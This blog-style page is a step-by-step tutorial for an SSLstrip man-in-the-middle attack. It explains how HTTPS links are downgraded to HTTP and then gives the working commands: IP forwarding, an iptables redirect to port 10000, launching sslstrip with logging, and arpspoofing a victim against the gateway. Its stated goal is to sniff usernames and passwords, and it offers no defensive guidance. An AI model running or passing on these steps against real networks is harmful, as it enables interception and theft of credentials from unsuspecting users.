Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

SSLstrip - SSL Hijacking Tool

HTTPS can easily be defeated by a MITM, using SSLStrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Here is how the exploit works: right in the middle, the attacker forces the client to operate in an unencrypted mode by stripping the "s" from all the "HTTPS" he will find in the headers/html.


The hacker gets the plain-text credentials, connects to the server via HTTPS using those credentials, gets the response, decrypts it, and forwards that back to the client. Thus, the server is satisfied, since everything is "correctly" encrypted, while the client is forced to use an unencrypted communication channel, without even noticing it.



Basically, these are the things you need to do to get SSLstrip running on BackTrack.

1- Switch the attacker machine into IP forwarding mode so that it can forward the victim's packet to the right address.
    echo "1" > /proc/sys/net/ipv4/ip_forward

2- Setup iptables to redirect HTTP traffic to SSLstrip so that all traffic that is connecting to port 80 will then be redirected to port 10000 (or any other port that you wish to use for e.g. 8080)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

3- Run SSLstrip and log to a file name secret
    python sslstrip.py -w secret 

4- Run arpspoof attack between Victim and Gateway
    arpspoof -i eth0 -t 192.168.1.6 192.168.1.1




That is really all that we have to do to compromise a network and sniff usernames and passwords. It takes a few commands in a Linux machine to be able to steal your "secure" information.

You can also watch this video tutorial on how to perform SSLstrip attack.

 
Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!